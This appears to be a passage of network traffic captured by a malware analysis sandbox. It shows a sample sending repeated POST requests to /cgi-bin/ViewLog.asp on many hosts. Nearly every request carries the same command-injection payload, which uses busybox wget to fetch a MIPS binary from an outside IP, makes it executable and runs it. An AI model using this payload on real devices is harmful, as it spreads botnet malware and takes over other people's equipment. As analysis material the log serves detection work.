                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              488192.168.2.133437494.120.40.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.776459932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              489192.168.2.133691494.120.168.388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.809240103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              490192.168.2.134024631.136.89.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.961795092 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:40.519695997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.638278008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.974253893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:48.582254887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.542212963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.230170012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              491192.168.2.134414895.217.194.1228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.120306015 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              492192.168.2.135092885.255.165.2448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.133035898 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:40.341758013 CET556INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Thu, 23 Nov 2023 04:17:42 GMT
                                              Connection: close
                                              Content-Length: 311
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
                                              Nov 23, 2023 05:17:40.933310986 CET556INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Thu, 23 Nov 2023 04:17:42 GMT
                                              Connection: close
                                              Content-Length: 311
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              493192.168.2.134586631.200.39.2468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.162420988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.414282084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.854259968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.766315937 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.654253006 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.174221039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              494192.168.2.135551885.10.89.478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.766582966 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.006901026 CET276INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                              Access-Control-Allow-Headers: content-type, accept
                                              Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              495192.168.2.134846431.136.103.1108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.949402094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.510363102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.630269051 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.998251915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
